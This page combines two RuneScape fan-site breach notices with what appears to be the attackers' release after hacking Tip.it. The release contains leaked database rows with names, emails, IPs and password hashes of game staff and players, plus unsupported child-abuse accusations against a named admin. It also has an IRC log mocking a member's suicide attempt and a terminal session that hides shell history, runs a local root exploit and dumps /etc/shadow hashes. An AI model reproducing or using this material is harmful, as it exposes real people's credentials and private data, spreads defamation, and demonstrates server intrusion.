RuneHQ hacked

So what exactly happened?

Well, we were the latest victims of a nasty group of people going around finding vulnerabilities in RuneScape fan sites. There was an old, outdated piece of code lingering on our site longer than it should have been and these guys took advantage of it. They managed to grab the entire members database including emails, RHQ login and display names, hashed passwords, and more.

At some point we figured out the hole in our security and a hotfix was implemented preventing this type of action further, but it was too late as they already had what they came for. When it was discovered exactly what had happened, we took the forums offline completely and began to investigate our options.

In the end we decided to completely start fresh with the forums. We decided this for a couple reasons.

• Our database had been filling up with junk for a number of years. It was time to clean it up and clear some things out anyways.
• You would all be required to at the very least enter a new password. We probably would have required a new login name as well.
• There was initially a minor glitch in the backup process with our forums.
• The hackers were also sometimes using info posted on your HQ accounts to help try and recover your accounts. Removing everything prevents them from having any current info or quite as easily being able to match up who is who.
• A number of people would ask for their accounts to be removed anyways due to a lack of trust from us now.

It was just better for everyone's safety to wipe it all. We are aware of who is responsible, so please do not post any links regarding this issue as it will only lead to an instant ban of your account.

On behalf of everyone here at RuneHQ, I'm deeply sorry that this happened and I apologize for everything that has taken place. I hope you continue to use us as your number one source for all RuneScape information as we will continuing striving to be the best help site out there.

When you re-register, please keep in mind that you should NEVER use your RuneScape password on any other website. Your password should also be complex. Here is a very short list of passwords you should never use:

• password
• dragon
• runescape
• qwerty
• abc123
• [your username]
• [anything that is one, simple, real word]

Sphere: Related Content

Tip.it got hacked

Hello Folks,

As you know Tip.It and Forum.Tip.It have been down most of October 11 and continues to be down. Tip.It's servers were unfortunately hacked and the only way to ensure user security and regain control of our servers was to shut down the servers until we can be completely confident that they are safe again. 

As a result, it is likely that segments of our user database were dumped and are now in the hands of other people to use against your RuneScape account or other online accounts. The stolen data may or may not include usernames, password hashes, email addresses, IP addresses and any other information you may have provided on the Tip.It Forums. Please note that your forum password was absolutely NOT stored in plain text - all passwords on our forums are encrypted and will require brute forcing from the hackers in order to render them usable. Regardless, we are assuming the worst and recommending you take action now to ensure your accounts are all secure.

It is highly recommended to ensure that your password and email address used on Tip.It are NOT used ANYWHERE else on the internet, especially on your RuneScape account. If you use the same password and/or email address on your RuneScape account, it is HIGHLY likely that your account will be compromised sooner or later. Don't take the risk - use a UNIQUE password and email address on your RuneScape account to insure maximum security. 

We also highly recommend you beef up the security on your email address. Often times hackers can gain access to your email and wreak havoc by accessing any accounts tied into that particular email. A few tips to ensure email account safety:
-Don't be sloppy on your recoveries - make them as difficult to crack as your password. Random numbers, letters and symbols with mixed cases works beautifully!
-Delete old emails you have no need to keep - the less information stored in your email the better!
-Use two-step verification with your mobile device wherever possible - this is powerful tool to keep unauthorized people out of your email!

As of now, approximately 0230 GMT on October 12, 2011, and for several hours prior to this, all Tip.It's servers are entirely under the control of the Tip.It administration. Every effort is being made by the administration to restore normal service as soon as possible. 

Lastly, all rumours surrounding Tip.It Administrators' involvement in child pornography are entirely FALSE and are exactly that - RUMOURS. No staff members at Tip.It are involved in the creation or distribution of child pornography nor is there pornography of any kind on Tip.It servers. These are simply rumours created to cause controversy in the community - and it has worked. Again, these allegations are ENTIRELY FALSE.

This is all the information available at this point. We will do our best to continue to update the community as much as possible through these difficult times. We appreciate your support during this rough time and we apologize for the inconvenience that this downtime causes to your game play.

Respectfully yours,

Tip.It Administrative Team

         ,.         ,·´'; '        ,.-·.                ,.-·~·-., '                   ,.-·~·-., '                        ,.,   '               ,. –  - .,  °            ,. -  .,                           ,. -,    
      ;'´*´ ,'\       ,'  ';'\°      /    ;'\'         ,.·´ ,. - .,   '`.             ,.·´ ,. - .,   '`.                     ;´   '· .,             ';_,.., _     '`. '      ,' ,. -  .,  `' ·,              ,.·'´,    ,'\   
      ;    ';::\      ;  ;::'\     ;    ;:::\      ,'´ ,·´\::::::::`;  ';\  '      ,'´ ,·´\::::::::`;  ';\  '              .´  .-,    ';\            \:::::::::::';   ,'\     '; '·~;:::::'`,   ';\       ,·'´ .·´'´-·'´::::\' 
     ;      '\;'      ;  ;:::;    ';    ;::::;'    ,'  ;'::::\;::-::;:';  ;:\      ,'  ;'::::\;::-::;:';  ;:\              /   /:\:';   ;:'\'           '\_;::;:,·´  .·´::\‘    ;   ,':\::;:´  .·´::\'    ;    ';:::\::\::;:'  
    ,'  ,'`\   \      ;  ;:::;     ;   ;::::;     ';  ';::;·´       ,'  ,'::';     ';  ';::;·´       ,'  ,'::';           ,'  ,'::::'\';  ;::';               , '´ .·´:::::;'      ;  ·'-·'´,.-·'´:::::::';   \·.    `·;:'-·'´     
    ;  ;::;'\  '\    ;  ;:::;     ';  ;'::::;     .';'\  '\;'       .'  .':::::;'   .';'\  '\;'       .'  .':::::;'      ,.-·'  '·~^*'´¨,  ';::;             .´  .'::::::;·´'     ;´    ':,´:::::::::::·´'     \:`·.   '`·,  '     
   ;  ;:::;  '\  '\ ,'  ;:::;'     ;  ';:::';    ';  \:'.   '·,  ,·´ .·'::::::;'  ';  \:'.   '·,  ,·´ .·'::::::;'       ':,  ,·:²*´¨¯'`;  ;::';         .·´ ,·´:::::;·´          ';  ,    `·:;:-·'´            `·:'`·,   \'      
  ,' ,'::;'     '\   ¨ ,'\::;'      ';  ;::::;'    \   `·:`·   '´ ;´::::::::;' '   \   `·:`·   '´ ;´::::::::;' '       ,'  / \::::::::';  ;::';      ,·´  .´;::–·~^*'´';\‚      ; ,':\'`:·.,  ` ·.,            ,.'-:;'  ,·\     
  ;.'\::;        \`*´\::\; °      \*´\:::;‘      \` ·- · :\`·.  `·:;:·´ '       \` ·- · :\`·.  `·:;:·´ '        ,' ,'::::\·²*'´¨¯':,'\:;       '.,_ ,. -·~:*'´¨¯:\:\ °   \·-;::\:::::'`:·-.,';     ,·'´     ,.·´:::'\    
  \:::\'          '\:::\:' '         '\::\:;'        '\::::::::\:;` · .,.'·  '       '\::::::::\:;` · .,.'·  '       \`¨\:::/          \::\'        \:::::::::::::::::::\;      \::\:;'` ·:;:::::\::\'    \`*'´\::::::::;·'‘   
    \:'             `*´'‚             `*´‘           ` ·- · '´`·:::::\::\           ` ·- · '´`·:::::\::\          '\::\;'            '\;'  '       \:;_;::-·~^*'´¨¯'         '·-·'       `' · -':::''    \::::\:;:·´        
                                                                ` · :\_\‚                     ` · :\_\‚          `¨'                                                                                 '`*'´‘            

~ Raflz - Led-Zeppelin - Sigex3unit ~

heya friends!

So.. the niqaz here trollin' along the tip.it sidewalk when we hear some rumours about a tip.it box seeding childporn..                      
Immediately this grabs our attention due to the fact we're all huge humanitarians and really care about kids.                                
We start an investigation into this.                                                                                                         
During our investigation we find out silverion and associates ALSO abuse all types of kids and users into buying their site merchandise and..
They make over 2K USD a day doing so, selling shirts, cups, and what not, including ads.                                                     
So, we decide that we have to hack tip.it as we start to find growing evidence of such horrible activity                                     
and sure enough, after about one week of doing our magic we get in.                                                                          
THERE IN THE /home/ FOLDER.. NEED I EVEN SAY WHAT WE FOUND? WHAT DO YOU THINK?                                                               

SILVERION IS FUCKING SICK.                                                                                                                   
The only thing to do now is to force-close tip.it.                                                                                           
To all the children who may have been approached sexually by silverion or other admins.                                                      
Please contact the police or go see a shrink as we have some logs of this happening, but will not be posting.                                

Truly a horrible thing to find.

Now how about them jagex mods getting hacked? uh oh I think we might be responsible!!                                                                                                                                                                                                                 
|    193396 | mithandriel                           | tim.gaming@gmail.com                                                                  | 212.44.19.206   | ca3e57f0732fe8df2e686f8f099b7676 | jGnuv             | darth_vader                           | mithandriel                           |
|    209342 | baker011                              | gregg.baker@jagex.com                                                                 | 212.44.19.206   | 022176e3ab7f735f5298b7eb96ddcd81 | $":l'             | baker011                              | baker011                              |
|        65 | Paul                                  | paul@jagex.com                                                                        |                 |                                  |                   | paul                                  | paul                                  |
|      4906 | rincewind01                           | simon.brace@jagex.com                                                                 |                 |                                  |                   | rincewind01                           | rincewind01                           |
|      5720 | Tolakin                               | tytn@jagex.com                                                                        |                 |                                  |                   | tolakin                               | tolakin                               |
|     10899 | blutack                               | mark.ogilvie@jagex.com                                                                |                 |                                  |                   | blutack                               | blutack                               |
|     91774 | Ross_Mills                            | ross.mills@jagex.com                                                                  |                 |                                  |                   | ross_mills                            | ross_mills                            |
|    112488 | 74387454at                            | lameo@jagex.com                                                                       |                 |                                  |                   | 74387454at                            | 74387454at                            |
|    187651 | Hohbein                               | chris.hohbein@jagex.com                                                               | 212.44.19.206   | b7222735fce3760e0191e03499897b69 | rTu]z             | hohbein                               | hohbein                               |
|    209920 | Eduardo                               | fansites@jagex.com                                                                    | 69.11.111.56    | fa9ce04dffbc8932ec441b71c559dafa | kam}c             | eduardo                               | eduardo                               |
|    182633 | Pilbeam                               | 6894@tmp                                                                              | 212.44.19.206   |                                  |                   | pilbeam                               | pilbeam                               |
|    181507 | Choobein                              | hohbeinfansites@googlemail.com                                                        | 212.44.19.206   |                                  |                   | choobein                              | choobein                              |
|    165641 | obidiah                               | friedkipper@yahoo.co.uk                                                               | 212.44.19.206   | 3baea46bf195edde0379f62e808b35da |                   | obidiah                               | obidiah                               |
|    209343 | Zachory                               | zacantonaci@hotmail.com                                                               | 212.44.19.206   | 799c2d48ac83dfa95695f63192c7d880 | [p-Z2             | _zach_                                | zachory                               |
|  181727 | 74387454at                | f5e86ffe2cbe84e75097f44e402c6429 | lameo@jagex.com                                                              | fronttooth       | 87648                                                                                                                   |
|  160956 | Ross_Mills                | 1b26983ac0ebbeca11089af9032762e3 | ross.mills@jagex.com                                                         | NULL             |                                                                                                                         |
|   19726 | blutack                   | 8869aff85a1be23274b622b2f6d1fe33 | mark.ogilvie@jagex.com                                                       | NULL             |                                                                                                                         |
|    8934 | Tolakin                   | 2634bf743a7199dc2aab20987b42bf02 | tytn@jagex.com                                                               | NULL             |                                                                                                                         |
|    7364 | rincewind01               | d2aa6a7090d9a3d20df7376a109b349d | simon.brace@jagex.com                                                        | NULL             |                                                                                                                         |
|      68 | Paul                      | afaa6fc39a06abac971ad4f747bb830e | Paul@jagex.com                                                               |                  |                                                                                                                         |


and just for the lulz...
|   12018 | Zezima                    | 4dce43b48137ec3cd5782f8dc8728c10 | peter_zezima@hotmail.com                                                     |                                                                                                                                            |
|      7399 | Zezima                                | peter_zezima@hotmail.com                                                              | 137.99.170.196  | 4a6bafbda23f350cc394fb91d178f10d | ?L5b.             | zezima                                | zezima                                |

irc.SwiftIRC.net

                                                                                                                                               
                                                                                   iiii                                                        
     ######    ######                                                             i::::i                                                       
     #::::#    #::::#                                                              iiii                                                        
     #::::#    #::::#                                                                                                                          
######::::######::::######rrrrr   rrrrrrrrr       ssssssssss   nnnn  nnnnnnnn    iiiiiii    qqqqqqqqq   qqqqq aaaaaaaaaaaaa   zzzzzzzzzzzzzzzzz
#::::::::::::::::::::::::#r::::rrr:::::::::r    ss::::::::::s  n:::nn::::::::nn  i:::::i   q:::::::::qqq::::q a::::::::::::a  z:::::::::::::::z
######::::######::::######r:::::::::::::::::r ss:::::::::::::s n::::::::::::::nn  i::::i  q:::::::::::::::::q aaaaaaaaa:::::a z::::::::::::::z 
     #::::#    #::::#     rr::::::rrrrr::::::rs::::::ssss:::::snn:::::::::::::::n i::::i q::::::qqqqq::::::qq          a::::a zzzzzzzz::::::z  
     #::::#    #::::#      r:::::r     r:::::r s:::::s  ssssss   n:::::nnnn:::::n i::::i q:::::q     q:::::q    aaaaaaa:::::a       z::::::z   
######::::######::::###### r:::::r     rrrrrrr   s::::::s        n::::n    n::::n i::::i q:::::q     q:::::q  aa::::::::::::a      z::::::z    
#::::::::::::::::::::::::# r:::::r                  s::::::s     n::::n    n::::n i::::i q:::::q     q:::::q a::::aaaa::::::a     z::::::z     
######::::######::::###### r:::::r            ssssss   s:::::s   n::::n    n::::n i::::i q::::::q    q:::::qa::::a    a:::::a    z::::::z      
     #::::#    #::::#      r:::::r            s:::::ssss::::::s  n::::n    n::::ni::::::iq:::::::qqqqq:::::qa::::a    a:::::a   z::::::zzzzzzzz
     #::::#    #::::#      r:::::r            s::::::::::::::s   n::::n    n::::ni::::::i q::::::::::::::::qa:::::aaaa::::::a  z::::::::::::::z
     ######    ######      r:::::r             s:::::::::::ss    n::::n    n::::ni::::::i  qq::::::::::::::q a::::::::::aa:::az:::::::::::::::z
                           rrrrrrr              sssssssssss      nnnnnn    nnnnnniiiiiiii    qqqqqqqq::::::q  aaaaaaaaaa  aaaazzzzzzzzzzzzzzzzz
                                                                                                     q:::::q                                   
                                                                                                     q:::::q                                   
                                                                                                    q:::::::q                                  
                                                                                                    q:::::::q                                  
                                                                                                    q:::::::q                                  
                                                                                                    qqqqqqqqq                                  
                                                                                                                                               

* Naffy (~JamesMurr@Swift-D212DF66.lnk.telstra.net) has joined #rsniqaz
 Hey narbs
<@Raflz> helo
<@Raflz> welcome bak 4m da ded
<@Raflz> wud u like tip it db
<@Raflz> to feast
 Hey man
 Do you guys all think im trolling?
<@Raflz> LOL
<@Raflz> should've hit the car faster bro
 LOL
 I really dont need this
 I'll talk to you guys later
 Ive been in the psych ward
 since sunday night
<@Raflz> ROFL
<@Raflz> do u want
<@Raflz> tip.it
 I just got out 
<@Raflz> to feast
<@Raflz> or not
 yeah.
 I would
 if thats a possibility
<@Raflz> i love you man
<@Raflz> im not gonna lie
 i really feel like doing it gave my life direction
<@Raflz> lets b butt buddiez
 I actually learnt something
 Yeah
<@Raflz> like
<@Raflz> how to hit a car faster
 hitting parked cars at 120KM/h hurts
 eh
<@Raflz> lesson:
 i'll paste the convo I had
<@Raflz> if ur gonna suicide
 right before I hit it
 with my mate
<@Raflz> hit a car faster next time
<@Raflz> LOL
 while i was snorting oxy
 ok
 paste it
<@Raflz> paste it pls
 wait up
 If you can beat me in a game of LoL 1v1
 i will give you tip.it
 me: man
 if i actually went through with it
 now
 would I be a bad person?
 Would I be selfish?
 him: Not worth it man
 Seriously
 Fucking
 You're actually intelligent
 me: but.. itd be over for me
 This convo suddenly turned really gay
 k
 No
 continue
 but yeah theres more
 o
 me: but there will be others man
 others like me
 others with such power.
 i see everything man, i know im insane
 but ive seen it for a long time
 i feel like i can see peoples thoughts
 I was referring to raflz use of the term 'bluenaffle' in pm
 him: There's no such thing as insane
 It's just difficult dealing with what you know
 Happened to my uncle
 me: ive got the keys man
 Im going to think about it on the drive
 but.. i always enjoyed talking to you.
<@Raflz> LOL
 i'll see you in another life brother
 im getting the last little pieces
 before i walk to the car
 one last cigarette.
 i told you 5
 so i'll stick to that
<@Raflz> man
<@Raflz> why didnt you hit it faster
 Can you see people naked?
<@Raflz> you just suck
 they wont come to terms with it
 but they will understand it.
 i'm hoping my dad left the keys.
 and if he didnt, they'll be on the kitchen table.
 whats your number?
 I'll give you a ring
 i lost control
 never really driven before
<@Raflz> just
<@Raflz> 120km/h rofl
 ok raflz
 dont be mean
 dude, that's pretty fucking fast.
 naffy is our friend
<@Raflz> no it isnt
<@Raflz> fuck off
 didnt feel like it 

Oh dem niqqaz, how do dey do it
[root@ldx ~]# ssh tip.it -lbulat

bulat@tip.it's password:

[bulat@web01 root]$ export HISTFILE=/dev/null
[bulat@web01 root]$ uname -a
Linux web01.tip.it 2.6.34.9-69.fc13.x86_64 #1 SMP Tue May 3 09:23:03 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
[bulat@web01 root]$ ./tr1p
Enter b1tch key: ******
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff8106b909
[+] Resolved prepare_kernel_cred to ffffffff8106b7f1
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@web01 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@web01 ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:497:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:496:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:495:Apache:/var/www:/sbin/nologin
haldaemon:x:68:494:HAL daemon:/:/sbin/nologin
openvpn:x:498:493:OpenVPN:/etc/openvpn:/sbin/nologin
distcache:x:94:492:Distcache:/:/sbin/nologin
saslauth:x:497:491:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:490::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:489::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:496:488:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:487:MySQL Server:/var/lib/mysql:/bin/bash
nm-openconnect:x:495:486:NetworkManager user for OpenConnect:/:/sbin/nologin
webalizer:x:67:485:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dovecot:x:494:483:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
backuppc:x:493:481::/var/lib/BackupPC:/sbin/nologin
torrent:x:492:480:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
wizard:x:501:501::/home/wizard:/bin/bash
eira:x:502:502::/home/eira:/bin/bash
beta:x:503:503::/home/beta:/bin/bash
peter:x:504:504::/home/peter:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
clamupdate:x:491:477:Clamav database update user:/var/lib/clamav:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
ntpd:x:505:505::/home/ntpd:/bin/bash
[root@web01 ~]# cat /etc/shadow
root:$1$qIp096Pv$zl2.573V3Ovhc5B/aYw0G/:15101:0:99999:7:::
bin:*:14715:0:99999:7:::
daemon:*:14715:0:99999:7:::
adm:*:14715:0:99999:7:::
lp:*:14715:0:99999:7:::
sync:*:14715:0:99999:7:::
shutdown:*:14715:0:99999:7:::
halt:*:14715:0:99999:7:::
mail:*:14715:0:99999:7:::
uucp:*:14715:0:99999:7:::
operator:*:14715:0:99999:7:::
games:*:14715:0:99999:7:::
gopher:*:14715:0:99999:7:::
ftp:*:14715:0:99999:7:::
nobody:*:14715:0:99999:7:::
dbus:!!:15101::::::
avahi-autoipd:!!:15101::::::
vcsa:!!:15101::::::
rpc:!!:15101:0:99999:7:::
named:!!:15101::::::
oprofile:!!:15101::::::
nscd:!!:15101::::::
rpcuser:!!:15101::::::
nfsnobody:!!:15101::::::
apache:!!:15101::::::
haldaemon:!!:15101::::::
openvpn:!!:15101::::::
distcache:!!:15101::::::
saslauth:!!:15101::::::
mailnull:!!:15101::::::
smmsp:!!:15101::::::
ntp:!!:15101::::::
avahi:!!:15101::::::
mysql:!!:15101::::::
nm-openconnect:!!:15101::::::
webalizer:!!:15101::::::
sshd:!!:15101::::::
squid:!!:15101::::::
dovecot:!!:15101::::::
tcpdump:!!:15101::::::
backuppc:!!:15101::::::
torrent:!!:15101::::::
bulat:$1$pbU71z/Y$B7ZmB6iJ06oaE.IBQfVPZ1:15102:0:99999:7:::
wizard:$1$CBfOJrU/$OZt5/z.bvCz8jSe5dGv4z0:15101:0:99999:7:::
eira:$1$mgj4N28N$t41xK8Keu/zcZbWQYDcrM/:15102:0:99999:7:::
beta:$1$D9qXxl5h$lLqbnp2aQu.TBT5CP/ZTZ/:15114:0:99999:7:::
peter:$1$Rw2yjv6w$9VRHWzZzZGsZdar5O0vbu/:15113:0:99999:7:::
postfix:!!:15102::::::
clamupdate:!!:15149::::::
qemu:!!:15149::::::
ntpd:$1$oIM2m0O9$utO5JUZ5DSsF2ZtcsMb4t1:15253:0:99999:7:::
[root@web01 ~]# cd ~bulat
[root@web01 bulat]# cat .bash_history
su -
ls
ls -lt
sftp bulat@forum.tip.it
[root@web01 bulat]# ls -la
total 9683064
drwx------   6 bulat bulat       4096 Oct 11 07:50 .
drwxr-xr-x.  8 root  root        4096 Oct  6 10:49 ..
drwxr-xr-x   3 bulat bulat       4096 Oct  7 01:11 b2
-rw-r--r--   1 bulat bulat    8918314 Sep  6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r--   1 root  root     7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r--   1 root  root   403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r--   1 bulat bulat  493592011 Sep  6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r--   1 root  root  4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r--   1 bulat bulat  399822071 Sep  6 07:58 backup-mysql-full-06092011.tar.gz
drwxr-xr-x  17 bulat bulat       4096 Oct  7 01:10 backups
drwxr-xr-x  14 bulat bulat       4096 Oct  7 01:14 backups-oldwww
-rw-r--r--   1 bulat bulat 4270006769 Sep  6 08:24 backup-www-full-06092011.tar.gz
-rw-r--r--   1 bulat bulat         18 May 21  2010 .bash_logout
-rw-r--r--   1 bulat bulat        176 May 21  2010 .bash_profile
-rw-r--r--   1 bulat bulat        124 May 21  2010 .bashrc
drwx------   3 bulat bulat       4096 Oct  9 08:09 .ssh
-rw-r--r--   1 bulat bulat        658 Mar 22  2010 .zshrc
[root@web01 bulat]# ls -la backup*
-rw-r--r--  1 bulat bulat    8918314 Sep  6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r--  1 root  root     7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r--  1 root  root   403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r--  1 bulat bulat  493592011 Sep  6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r--  1 root  root  4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r--  1 bulat bulat  399822071 Sep  6 07:58 backup-mysql-full-06092011.tar.gz
-rw-r--r--  1 bulat bulat 4270006769 Sep  6 08:24 backup-www-full-06092011.tar.gz

backups:
total 18520536
drwxr-xr-x 17 bulat bulat       4096 Oct  7 01:10 .
drwx------  6 bulat bulat       4096 Oct 11 07:50 ..
-rw-r--r--  1 root  root    68802560 May 19 14:18 backup-etc-2011051901.tar
-rw-r--r--  1 root  root    22169600 May 18 18:01 backup-etc-20110519.tar
-rw-r--r--  1 root  root     9019408 May 19 14:18 backup-forum-etc-20091210.tar.gz
-rw-r--r--  1 root  root   403491046 Oct  6 10:52 backup-forum-mysql-26092011.tar.gz
-rw-r--r--  1 root  root   708034560 May 18 19:02 backup-mysql-20110519.tar
-rw-r--r--  1 root  root    48271360 May  8 02:39 backup-mysql-beta-20110507.tar
-rw-r--r--  1 root  root   699760640 May  8 02:41 backup-mysql-full-20110507.tar
-rw-r--r--  1 root  root   699627520 May  8 02:42 backup-mysql-full-20110508.tar
-rw-r--r--  1 root  root     2723840 May  8 02:42 backup-mysql-lotro-20110507.tar
-rw-r--r--  1 root  root   604866560 May  8 02:44 backup-mysql-runescape-20110507.tar
-rw-r--r--  1 root  root      870400 May  7 10:01 backup-w2-arena-20110507.tar
-rw-r--r--  1 root  root   960880640 May  7 10:03 backup-w2-beta-20110507.tar
-rw-r--r--  1 root  root    16844800 May  7 10:03 backup-w2-easygadget-20110507.tar
-rw-r--r--  1 root  root  3998003200 May  7 10:12 backup-w2-html-20110507.tar
-rw-r--r--  1 root  root    11192320 May  7 10:12 backup-w2-lotro-20110507.tar
-rw-r--r--  1 root  root       10240 May  7 10:12 backup-w2-trieste-20110507.tar
-rw-r--r--  1 root  root     1587200 May  7 10:12 backup-w2-war-20110507.tar
-rw-r--r--  1 root  root  5302497280 May 18 19:13 backup-www-20110519.tar
-rw-r--r--  1 root  root    68802560 May 19 14:18 backup-wwwetc-20110519.tar
drwx------  2 mysql mysql      12288 May  7 18:00 beta
-rw-r--r--  1 root  root    19850900 May  8 02:44 full-w2-mysql-20070828.tgz
-rw-r--r--  1 root  root    17941509 May  8 02:44 full-w2-mysql-20080608.tgz
-rw-r--r--  1 root  root  5245419520 May  7 10:24 full-w2-www-20110507.tar
drwx------  2 mysql mysql       4096 Jul  2  2007 lotro
drwx------  2 mysql mysql       4096 Mar  4  2007 MD_Stats
drwx------  2 mysql mysql       4096 Nov 24  2006 mysql
-rw-r--r--  1 root  root    19374500 May  8 02:44 mysql-20080827.tar.gz
drwx------  2 mysql mysql       4096 Dec 18  2003 mysql-old
-rw-r--r--  1 root  root    16208748 May  8 02:44 mysql.tar.gz-OLD
drwx------  2 mysql mysql       4096 Nov 24  2006 phpmyadmin
drwx------  2 mysql mysql       4096 May  8 00:51 PhpStats019
drwx------  2 mysql mysql       4096 Jul 11  2008 rewrite
drwx------  2 mysql mysql      12288 Oct  7 01:11 runescape
drwx------  2 mysql mysql       4096 Jan 30  2008 runescape_copy
drwx------  2 mysql mysql       4096 Sep 15  2007 silks
drwx------  2 mysql mysql       4096 Jul 30  2007 volantini
drwx------  2 mysql mysql       4096 Oct  2  2008 war
drwxr-xr-x 15 mysql mysql       4096 May 19 13:38 wwwsql
drwx------  2 mysql mysql       4096 Apr 14 02:34 zenit

backups-oldwww:
total 9586804
drwxr-xr-x 14 bulat bulat       4096 Oct  7 01:14 .
drwx------  6 bulat bulat       4096 Oct 11 07:50 ..
-rw-r--r--  1 root  root     9009631 May 21 12:54 backup-etc-2011051901.tar.gz
-rw-r--r--  1 root  root     9019408 May 21 12:54 backup-forum-etc-20091210.tar.gz
-rw-r--r--  1 root  root   435602073 May 21 12:55 backup-forum-html-20091210.tar.gz
-rw-r--r--  1 root  root     1222295 May 21 12:55 backup-forum-teamspeak-20091210.tar.gz
-rw-r--r--  1 root  root   201001674 May 21 12:59 backup-mysql-20110519.tar.gz
-rw-r--r--  1 root  root    13800344 May 21 13:00 backup-mysql-beta-20110507.tar.gz
-rw-r--r--  1 root  root   197321301 May 21 13:05 backup-mysql-full-20110507.tar.gz
-rw-r--r--  1 root  root   197287223 May 21 13:11 backup-mysql-full-20110508.tar.gz
-rw-r--r--  1 root  root      764740 May 21 13:11 backup-mysql-lotro-20110507.tar.gz
-rw-r--r--  1 root  root   172928002 May 21 13:16 backup-mysql-runescape-20110507.tar.gz
-rw-r--r--  1 root  root      298212 May 21 13:16 backup-w2-arena-20110507.tar.gz
-rw-r--r--  1 root  root   575464655 May 21 13:21 backup-w2-beta-20110507.tar.gz
-rw-r--r--  1 root  root    11999273 May 21 13:22 backup-w2-easygadget-20110507.tar.gz
-rw-r--r--  1 root  root  1682773384 May 21 13:45 backup-w2-html-20110507.tar.gz
-rw-r--r--  1 root  root     8756867 May 21 13:45 backup-w2-lotro-20110507.tar.gz
-rw-r--r--  1 root  root        1035 May 21 13:45 backup-w2-trieste-20110507.tar.gz
-rw-r--r--  1 root  root      824683 May 21 13:45 backup-w2-war-20110507.tar.gz
-rw-r--r--  1 root  root  2413773014 May 21 14:17 backup-www-20110519.tar.gz
-rw-r--r--  1 root  root     9009490 May 21 14:17 backup-wwwetc-20110519.tar.gz
drwx------  2 mysql mysql       4096 Aug 15  2008 beta
-rw-r--r--  1 root  root     8485310 May 21 14:17 full-db-backup-03-25-07.tar.gz
-rw-r--r--  1 root  root     6820368 May 21 14:17 full-db-backup-12-14-06.tar.gz
-rw-r--r--  1 root  root    30778399 May 21 14:18 full-db-backup-2010-04-25.1.tar.gz
-rw-r--r--  1 root  root    30778779 May 21 14:18 full-db-backup-2010-04-25.tar.gz
-rw-r--r--  1 root  root    19850900 May 21 14:18 full-w2-mysql-20070828.tgz
-rw-r--r--  1 root  root    17941509 May 21 14:19 full-w2-mysql-20080608.tgz
-rw-r--r--  1 root  root   586278595 May 21 14:21 full-w2-www-20070828.tgz
-rw-r--r--  1 root  root  2389188411 May 21 14:47 full-w2-www-20110507.tar.gz
drwx------  2 mysql mysql       4096 Jul  2  2007 lotro
drwx------ 16 mysql mysql       4096 Nov 24  2006 mysql
-rw-r--r--  1 root  root    19374500 May 21 14:47 mysql-20080827.tar.gz
-rw-r--r--  1 root  root    16208748 May 21 14:47 mysql.tar.gz-OLD
drwx------  2 mysql mysql       4096 Nov 24  2006 phpmyadmin
drwx------  2 mysql mysql       4096 Aug 27  2008 PhpStats019
drwx------  2 mysql mysql       4096 Jul 11  2008 rewrite
drwx------  2 mysql mysql       4096 Aug 16  2008 runescape
drwx------  2 mysql mysql       4096 Jan 30  2008 runescape_copy
drwxr-xr-x  3 root  root        4096 Oct  6 11:09 var
drwx------  2 mysql mysql       4096 Jul 30  2007 volantini
drwx------  2 mysql mysql       4096 Sep 16  2007 war
-rw-r--r--  1 root  root   740444414 May 21 14:51 www.tar.gz-OLD
